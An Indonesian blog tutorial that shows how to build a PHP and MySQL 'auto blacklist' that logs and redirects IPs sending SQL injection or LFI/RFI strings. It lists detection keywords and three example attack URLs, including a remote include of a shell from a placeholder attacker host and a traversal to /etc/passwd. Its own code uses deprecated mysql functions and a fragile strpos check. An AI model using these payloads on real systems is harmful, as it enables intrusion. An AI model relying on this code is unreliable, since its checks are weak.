Untuk mempersingkat waktu dan dari pada banyak bacot sesuai judul diatas
kali ini saya akan menjelaskan tehnik mengamankan web menggunakan Auto
Blacklist,, dimana,, apabila ada attacker yang mau nyoba-nyoba dengan
web kita menggunakan tehnik SQL Injection maupun LFI/RFI maka web akan
secara otomatis memasukan IPnya ke daftar blacklist dan secara otomatis
mengalihkan attacker ke halaman yang sudah kita tentukan sebelumnya,,
heheheheheheee,, Kira-kira begitu,, 
Ok,, langsung ke topik,,
Pertama buatlah sebuah tabel pada database kamu, contoh tabel blacklist
Ok,, langsung ke topik,,
Pertama buatlah sebuah tabel pada database kamu, contoh tabel blacklist
CREATE TABLE `blacklist` (
`ip_attacker` varchar(50) NOT NULL) Sekarang kita akan membuat sebuah file yang akan mendeteksi gerak-gerik
sang attacker tersebut, dan apabila terdeteksi melakukan sesuatu hal
yang dianggap melakukan Pengijeksiaan maka akan otomatis menyalin IP
attacker tersebut
file "blacklist.php" //Deteksi user yang memasukan sebuah perintah penginjesian terhadap web kitaif(strpos($_SERVER['REQUEST_URI'], "%27") || strpos($_SERVER['REQUEST_URI'], "union") || strpos($_SERVER['REQUEST_URI'], "http://") || strpos($_SERVER['REQUEST_URI'], "www.") || strpos($_SERVER['REQUEST_URI'], "../") || strpos($_SERVER['REQUEST_URI'], "etc/passwd")) {
//Apabila terdeteksi melakukan penginjeksian, ambil IP mereka$ip = $_SERVER['REMOTE_ADDR'];
//Kirim IP ke database kita$kirim_ip = mysql_query("INSERT INTO blacklist VALUE ('$ip')");
}?>Setelah itu masuk ke file yang kamu rasa dapat di injeksi, saya contohkan file index.php
Contoh Penginjeksian oleh attacker
http://www.web.kamu/index.php?id=1' (SQL Injection)
http://www.web.kamu/index.php?page=http://www.root.attacker/shell.txt (RFI/LFI)
http://www.web.kamu/index.php?page=../../etc/passwd (RFI/LFI)
Untuk penjelasan tehnik diatas mungkin bisa di googling sendiri atau
mungkin sudah banyak yang tahu,, karena disini kita akan membahas
mengenai Auto Blacklist maka saya juga tidak akan memfokuskan dalam
penjelasan tekhnik diatas,, 
Oke Next..
Setelah masuk ke file index.php lakukan pengonekan pada file blacklist.php, gunakan fungsi include() include "blacklist.php";
Terus jangan lupa lakukan penganalisian IP, untuk mengalihkan attacker ke tempat lain apabila attacker mengakses web kita lagi //Periksa IP attacker tersebut apa pernah masuk ke database kita$ipattacker = mysql_query("SELECT * FROM blacklist where ip_attacker = '".$_SERVER['REMOTE_ADDR']."'");$konfirmasi_attacker = mysql_num_rows($ipattacker);
//Apabila IP telah terdeteksi pernah masuk ke database maka alihkan attacker ke halaman lain, contoh :google.comif ($konfirmasi_attacker !== 0) {header('Location:http://google.com');
}?> Mungkin hanya itu dulu dari saya,, semoga sedikit membantu dalam pengamanan web kita dari tangan-tangan jahil,, Created By tolonggalo HN 
No comments:
Post a Comment